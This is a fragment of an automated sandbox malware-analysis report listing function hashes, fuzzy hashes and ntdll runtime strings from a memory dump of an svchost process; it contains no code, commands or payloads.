                                                                                        • Opcode ID: 072dc0de41f7c182bed604b821e4c6485131f31f0d2ee29dc696c32059f34826
                                                                                        • Instruction ID: 1983b86864fdc9697310b1b4b75938a59cfe60ef6225062f04e6626637098400
                                                                                        • Opcode Fuzzy Hash: 072dc0de41f7c182bed604b821e4c6485131f31f0d2ee29dc696c32059f34826
                                                                                        • Instruction Fuzzy Hash: 34900221601404464140B2A888849464006ABE13117A5C161A199C554D865989695666
                                                                                        Function 03872FE0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d534d4c1d5ef82fc4430989d261844d9d939af3452edde1cec066700daabb25c
                                                                                        • Instruction ID: 06a82161c8354bf48f8a640caecd29b186795f737c55a36de0b728ea611bfb51
                                                                                        • Opcode Fuzzy Hash: d534d4c1d5ef82fc4430989d261844d9d939af3452edde1cec066700daabb25c
                                                                                        • Instruction Fuzzy Hash: 8E900221211C0446D200B6A84C54B47000687D0303FA5C155A1158558CCA1589655522
                                                                                        Function 03872F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5088da80c10d95947347ba15a4762e26c670219591d5999ed924af9f1e940cc5
                                                                                        • Instruction ID: 244c40a51976ae1ed193d35ec2f1ca08503bd4a18e9eed2f49205e8685346ae7
                                                                                        • Opcode Fuzzy Hash: 5088da80c10d95947347ba15a4762e26c670219591d5999ed924af9f1e940cc5
                                                                                        • Instruction Fuzzy Hash: 1890026134140846D100B2984454B460006C7E1301FA5C055E2068558D8719CD566127
                                                                                        Function 03872F60 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: edaa62b715c4531957eabc6e806d00a7df2d21620885d71c5e231e6cd3191850
                                                                                        • Instruction ID: 17b643377ac8447e4e10d033a87b562093b94c5ac6bcf516229e4434ad226185
                                                                                        • Opcode Fuzzy Hash: edaa62b715c4531957eabc6e806d00a7df2d21620885d71c5e231e6cd3191850
                                                                                        • Instruction Fuzzy Hash: 1D90026121140446D104B2984444746004687E1301FA5C052A3158558CC6298D655126
                                                                                        Function 03872E80 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 341add43e8630aea0561152d639781153617f2f76261bf314d9d75670fde8c04
                                                                                        • Instruction ID: cfd5cf455fc320a9792499c68348bcdd9cc08754e4fae1bc4804885e1d4af621
                                                                                        • Opcode Fuzzy Hash: 341add43e8630aea0561152d639781153617f2f76261bf314d9d75670fde8c04
                                                                                        • Instruction Fuzzy Hash: 8790022160140906D101B2984444656000B87D0341FE5C062A2028559ECB258A96A132
                                                                                        Function 03872EA0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7c018e5b7222a37e91feaa5a7577432ea530415ac341188d51a1172e8ba561cb
                                                                                        • Instruction ID: cd65a714a82f43856e199d71a65957981f1eadf78cd555ea4db75f261dd8fc35
                                                                                        • Opcode Fuzzy Hash: 7c018e5b7222a37e91feaa5a7577432ea530415ac341188d51a1172e8ba561cb
                                                                                        • Instruction Fuzzy Hash: A090027120140806D140B2984444786000687D0301FA5C051A6068558E87598ED96666
                                                                                        Function 03872EE0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e3034d6bd98fd5482aa43321f20d5a21cd531f9e7af677755f4087dca6fdcd91
                                                                                        • Instruction ID: decebf6797983ac17ac24f5e4dfa95331608b2e8d65e5997eb654374ea22cd66
                                                                                        • Opcode Fuzzy Hash: e3034d6bd98fd5482aa43321f20d5a21cd531f9e7af677755f4087dca6fdcd91
                                                                                        • Instruction Fuzzy Hash: 1790026120180807D140B6984844647000687D0302FA5C051A3068559E8B298D556136
                                                                                        Function 03872E30 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cccea602ceb8105dedf6717052dfa9c1f308b36ceb4b267ca4bfb56e00f34efe
                                                                                        • Instruction ID: df764ec4dfde538a1753ef96c49f16bc7bf9980baedad5bc88cfb74e06050de9
                                                                                        • Opcode Fuzzy Hash: cccea602ceb8105dedf6717052dfa9c1f308b36ceb4b267ca4bfb56e00f34efe
                                                                                        • Instruction Fuzzy Hash: 8890022130140806D102B2984454646000AC7D1345FE5C052E2428559D87258A57A133
                                                                                        Function 03872DB0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dc7b05384b429aea0fa859edbfc775a93cfd94fb7a01b1f42d9346aed7b03df3
                                                                                        • Instruction ID: efb2598950f4cf875b0281e5145e8cc7d9d90ce10ef4f7fd88b192cb912533ee
                                                                                        • Opcode Fuzzy Hash: dc7b05384b429aea0fa859edbfc775a93cfd94fb7a01b1f42d9346aed7b03df3
                                                                                        • Instruction Fuzzy Hash: 2690023124140806D141B2984444646000A97D0341FE5C052A1428558E87558B5AAA62
                                                                                        Function 03872DD0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4b4fb39955c1cdec55061755ad517508a3f776cc56bf3a800a3dece65af5e88a
                                                                                        • Instruction ID: de6efbafae872ce13a6d9fceaed45a35838300e8da87186796d146a0d8585e5b
                                                                                        • Opcode Fuzzy Hash: 4b4fb39955c1cdec55061755ad517508a3f776cc56bf3a800a3dece65af5e88a
                                                                                        • Instruction Fuzzy Hash: BD900221242445565545F2984444547400797E03417E5C052A2418954C8626995AD622
                                                                                        Function 03872D00 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d1f69aa8cee3638f39afc50af1d73da150ddad837b3f5455b8decaa8afdfd049
                                                                                        • Instruction ID: a9f65c2e18b59072fd97a359d022481033e396322d1a37704766ea5268fbe0c9
                                                                                        • Opcode Fuzzy Hash: d1f69aa8cee3638f39afc50af1d73da150ddad837b3f5455b8decaa8afdfd049
                                                                                        • Instruction Fuzzy Hash: A690022120544846D100B6985448A46000687D0305FA5D051A2068599DC7358955A132
                                                                                        Function 03872D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9073a2541b3bdde796ef847ef00a211fb0574c3673f5675fa0731db2ba3decd9
                                                                                        • Instruction ID: 5b39f8da44cc78659186dc51bff5a1cef7ef990bff7038e8476aaa2073fe378a
                                                                                        • Opcode Fuzzy Hash: 9073a2541b3bdde796ef847ef00a211fb0574c3673f5675fa0731db2ba3decd9
                                                                                        • Instruction Fuzzy Hash: 5E90022921340406D180B298544864A000687D1302FE5D455A101955CCCA15896D5322
                                                                                        Function 03873D10 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9c4b7f4c4649a153a3a8d7e54d0df9c8919ad6c755b7a1b2ef5960f338d5c790
                                                                                        • Instruction ID: 751e154ed2ac53d8c516efdf2fddacf554d569638f1d754a92eacaa0a911c218
                                                                                        • Opcode Fuzzy Hash: 9c4b7f4c4649a153a3a8d7e54d0df9c8919ad6c755b7a1b2ef5960f338d5c790
                                                                                        • Instruction Fuzzy Hash: 15900231202405469540B3985844A8E410687E1302BE5D455A1019558CCA1489655222
                                                                                        Function 03872D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cdc3f98bee13ad6f7ed8df3fe0d495180cb3c2b38d0d8e31f45b4d4f27838f56
                                                                                        • Instruction ID: be3e35b29f021ff316d4fa2fbd53553878e98f524441bca3279f131d092092b3
                                                                                        • Opcode Fuzzy Hash: cdc3f98bee13ad6f7ed8df3fe0d495180cb3c2b38d0d8e31f45b4d4f27838f56
                                                                                        • Instruction Fuzzy Hash: B090022130140407D140B29854586464006D7E1301FA5D051E1418558CDA15895A5223
                                                                                        Function 03873D70 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ea8203e8300aa5611b6be6a6840f48c9b396102cb319a7f46b64d9b28e82cda2
                                                                                        • Instruction ID: 94146a427177c63766d660424cb4a3f956412a79c975dc7ce541c184d570ca2f
                                                                                        • Opcode Fuzzy Hash: ea8203e8300aa5611b6be6a6840f48c9b396102cb319a7f46b64d9b28e82cda2
                                                                                        • Instruction Fuzzy Hash: 2E90023520140806D510B2985844686004787D0301FA5D451A142855CD875489A5A122
                                                                                        Function 03872CA0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4501a37d8a086e0d2ccd81c338eb596380b658047d45a674dd4cdc612c1edae4
                                                                                        • Instruction ID: 7f95b53d0430a81cbac8962aed0cccc017eb08aaad18d6c03b4be93260020524
                                                                                        • Opcode Fuzzy Hash: 4501a37d8a086e0d2ccd81c338eb596380b658047d45a674dd4cdc612c1edae4
                                                                                        • Instruction Fuzzy Hash: EC90023120140806D100B6D85448686000687E0301FA5D051A6028559EC76589956132
                                                                                        Function 03872CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5cf6f3c2cdf0c19c16fcb578ef0226b179eba4ba16445f7f72c109b21f73c01a
                                                                                        • Instruction ID: 834d4467449375ab606000c28458e3513473d5d1f8e33c35b56ed8cb33dc7df4
                                                                                        • Opcode Fuzzy Hash: 5cf6f3c2cdf0c19c16fcb578ef0226b179eba4ba16445f7f72c109b21f73c01a
                                                                                        • Instruction Fuzzy Hash: 0890022160540806D140B2985458746001687D0301FA5D051A1028558DC7598B5966A2
                                                                                        Function 03872CF0 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fbf1962174ed7d3ac9a097de8b218fab332cb9d3571c3872dd65d92fef56f702
                                                                                        • Instruction ID: 2d98841639d2641092ff048de1d98bed1cbc1344d77ca4e208a592ad208d82f7
                                                                                        • Opcode Fuzzy Hash: fbf1962174ed7d3ac9a097de8b218fab332cb9d3571c3872dd65d92fef56f702
                                                                                        • Instruction Fuzzy Hash: 1D90023120140807D100B2985548747000687D0301FA5D451A142855CDD75689556122
                                                                                        Function 03872C60 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b0c0bd9cf8ee4f414bb70e704e7b0d6ad487f6696c921e51c26a4fce7931aa41
                                                                                        • Instruction ID: 62055f8a4a62b05dfafdeafe201549b50fc202b2b80ed4548d3f554b64592c51
                                                                                        • Opcode Fuzzy Hash: b0c0bd9cf8ee4f414bb70e704e7b0d6ad487f6696c921e51c26a4fce7931aa41
                                                                                        • Instruction Fuzzy Hash: 5790023120140C46D100B2984444B86000687E0301FA5C056A1128658D8715C9557522
                                                                                        Function 03872C70 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a8595e53248563fb9b11f9c14fb7678433c00c91a8260877eac96fa032b0d65f
                                                                                        • Instruction ID: 725ff3065874a0cb7581fd670df5d6917cfadb3ec04f454cd1351a7b2b59b057
                                                                                        • Opcode Fuzzy Hash: a8595e53248563fb9b11f9c14fb7678433c00c91a8260877eac96fa032b0d65f
                                                                                        • Instruction Fuzzy Hash: C390023120148C06D110B298844478A000687D0301FA9C451A542865CD879589957122
                                                                                        Function 03872C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                        • Instruction ID: be7fb967ab264efbad7884ff8963197c3efcedc6d9b9756293c0ae460048449a
                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Function 03872890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                        • API String ID: 48624451-2108815105
                                                                                        • Opcode ID: c49b10e7484e304360b164e7a8039be2190f65ad936d00172572865a8469e5c4
                                                                                        • Instruction ID: ea44d7a64406965c424ba81e8d099c5c2cf2a810920a2023199f903122d77852
                                                                                        • Opcode Fuzzy Hash: c49b10e7484e304360b164e7a8039be2190f65ad936d00172572865a8469e5c4
                                                                                        • Instruction Fuzzy Hash: 0C5109B5A0451ABFDF14DBDCC890A7EF7B9BB08204B1885E9E4A5D7641D338DE40CBA0
                                                                                        Function 03867630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 038A4725
                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 038A4787
                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 038A46FC
                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 038A4655
                                                                                        • Execute=1, xrefs: 038A4713
                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 038A4742
                                                                                        • ExecuteOptions, xrefs: 038A46A0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                        • API String ID: 0-484625025
                                                                                        • Opcode ID: b1bd6af37f2659520d0fe2cfc3b85f425ed3ea9f02cda2722d9371748d27511c
                                                                                        • Instruction ID: e52ea1b735e5ff404884de1d62f372543d7f53243a0cd35683fb27422a2c9b85
                                                                                        • Opcode Fuzzy Hash: b1bd6af37f2659520d0fe2cfc3b85f425ed3ea9f02cda2722d9371748d27511c
                                                                                        • Instruction Fuzzy Hash: 5951D93560071D6AEF20EAEDDC85FAE77BDAF04308F1400E9E505EB291E7719A45CB91
                                                                                        Function 0387B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: __aulldvrm
                                                                                        • String ID: +$-$0$0
                                                                                        • API String ID: 1302938615-699404926
                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                        • Instruction ID: 3316ce423bce16ca7a93c9f3c8cb72fd2850bd08a0de00fba1bff738255dfaf4
                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                        • Instruction Fuzzy Hash: 24817D74E052499BDF26CEE8C8917EEBBA7AF45390F1C42D9D861EB390C634D940CB51
                                                                                        Function 0385F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 038A02BD
                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 038A02E7
                                                                                        • RTL: Re-Waiting, xrefs: 038A031E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                        • API String ID: 0-2474120054
                                                                                        • Opcode ID: 6ab6b3b2f8dee82805a31c8fa55b754634dfd4bc2facec305b44bd54ff0d7297
                                                                                        • Instruction ID: b4963e099d299ce799e09d7217ddc9e50fc3a5a67f077213b7d3343ea066b151
                                                                                        • Opcode Fuzzy Hash: 6ab6b3b2f8dee82805a31c8fa55b754634dfd4bc2facec305b44bd54ff0d7297
                                                                                        • Instruction Fuzzy Hash: 88E1AE70608B41DFE725CFA8C884B2AB7E5BF84314F184A99FAA5CB2D1D774D944CB42
                                                                                        Function 0386BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • RTL: Re-Waiting, xrefs: 038A7BAC
                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 038A7B7F
                                                                                        • RTL: Resource at %p, xrefs: 038A7B8E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        • API String ID: 0-871070163
                                                                                        • Opcode ID: 8d5cc2b34add04f66e3299f7f8cd25a35efaba9a5a4c91d5856404e741c3e82a
                                                                                        • Instruction ID: 9219514e924e12696a4a7af0d1eb93e0aa122d13dddbf6632ae0cfa50b7e7579
                                                                                        • Opcode Fuzzy Hash: 8d5cc2b34add04f66e3299f7f8cd25a35efaba9a5a4c91d5856404e741c3e82a
                                                                                        • Instruction Fuzzy Hash: CB41F2353007029FD725DEAACC40B6AB7E9EF88714F140AADF95ADB290DB30E405CB91
                                                                                        Function 0386B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 038A728C
                                                                                        Strings
                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 038A7294
                                                                                        • RTL: Re-Waiting, xrefs: 038A72C1
                                                                                        • RTL: Resource at %p, xrefs: 038A72A3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        • API String ID: 885266447-605551621
                                                                                        • Opcode ID: ff61c9f397059b33bb4f171095d1bbc45bae6f7094b0dae384deaf21fb318b6c
                                                                                        • Instruction ID: f594f0b8acdde9b0d9b4e696bb51a9e2c1b22c610083e727e5974862240ec29d
                                                                                        • Opcode Fuzzy Hash: ff61c9f397059b33bb4f171095d1bbc45bae6f7094b0dae384deaf21fb318b6c
                                                                                        • Instruction Fuzzy Hash: 34412035700B46ABD721CEE9CC41B6AB7A5FF84718F1406A9F956EB240DB30E842C7D1
                                                                                        Function 03877D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: __aulldvrm
                                                                                        • String ID: +$-
                                                                                        • API String ID: 1302938615-2137968064
                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                        • Instruction ID: 959df31c333e438215706cea0b2c4b36607ce99f27616b24cbaa405f23541278
                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                        • Instruction Fuzzy Hash: 8891C271E0020A9BDF24DEE9C981ABEB7A7EF44720F1845AAF865E72D0D730C941C750
                                                                                        Function 03839126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_3800000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$@
                                                                                        • API String ID: 0-1194432280
